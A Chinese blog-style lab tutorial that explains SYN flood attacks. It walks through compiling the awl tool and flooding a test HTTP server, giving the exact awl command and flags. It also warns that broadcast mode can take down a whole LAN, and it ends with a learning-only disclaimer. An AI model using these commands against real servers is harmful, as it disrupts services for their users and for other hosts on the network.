SYN洪水攻击是一种DDoS攻击方式,利用TCP连接的三次握手过程,攻击者伪造IP发送大量SYN包给目标服务器,导致服务器资源耗尽,正常用户无法访问。本文详细介绍了SYN洪水攻击的步骤,包括ARP欺骗和awl工具的使用,并提醒了其可能对整个局域网的影响。同时,提到了防御策略,强调此类工具仅用于学习和研究,不应用于非法活动。
SYN洪水ATT的过程:
在服务端返回一个确认的SYN-ACK包的时候有个潜在的弊端,如果发起的客户是一个不存在的客户端,那么服务端就不会接到客户端回应的ACK包。
这时服务端需要耗费一定的数量的系统内存来等待这个未决的连接,直到等待超关闭,才能施放内存。
如果恶意者通过通过ip欺骗,发送大量SYN包给受害者系统,导致服务端存在大量未决的连接并占用大量内存和tcp连接,从而导致正常客户端无法访问服务端,这就是SYN洪水ATT的过程。
基本过程:从客户端到服务器
awl0.2下载地址:
开始安装awl
1.解压
root:~ # tar xf awl-0.2.tar
root:~ # cd awl-0.2/
root:~/awl-0.2 # ls
acconfig.h AUTHORS config.h.in configure.in include ltmain.sh missing src
acinclude.m4 ChangeLog config.sub COPYING INSTALL Makefile.am NEWS TODO
aclocal.m4 config.guess configure depcomp install-sh Makefile.in README
2.编译安装
root:~/awl-0.2 # ./configure --prefix=/app/awl #将全部文件安装至/app/awl/文件夹下
root:~/awl-0.2 # make -j 4 #以4个进程同时编译——把源代码编译成可执行的二进制文件
root:~/awl-0.2 # make install #安装
实验环境
在centos6上有一台http服务器 ip为172.22.50.52
服务 器端为centos7 ip为172.22.50.51
http服务为172.22.50.51
服务器(被ATT端)172.22.50.52
双方都能ping通
开始ATT
通过刚才ping 52 可用 arp -n 查看ping过的主机mac地址
# arp -n
awl参数如下:
-i 发送包的接口,如果省略默认是eth0
-m 指定目标mac地址 注:如果-m没有指定mac,默认目标MAC地址是“FF.FF.FF.FF.FF.FF”,
FF.FF.FF.FF.FF.FF MAC地址是什么?
这表示向同一网段内的所有主机发出ARP广播,进行SYNATT,还容易使整个局域网瘫痪。
-d 被ATT的机器的IP
-p 被ATT的机器的端口
在awl安装目录下使用awl(也可将awl文件夹写入PATH直接使用)
警告:在5秒内按CTLR+C停止
这里有大量的伪装ip对52进行访问
ATT时服务器http服务器已不能访问
停止后访问恢复正常
拓展:
./awl -i ens33 -m -d 172.22.50.52 -p 80
在-m后不要跟目标mac地址,默认目标MAC地址是“FF.FF.FF.FF.FF.FF”
这表示向同一网段内的所有主机发出ARP广播,进行SYN ATT,容易使整个局域网瘫痪
慎重使用
仅供学习网络协议,了解SYN洪水,请勿搞破坏
235
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
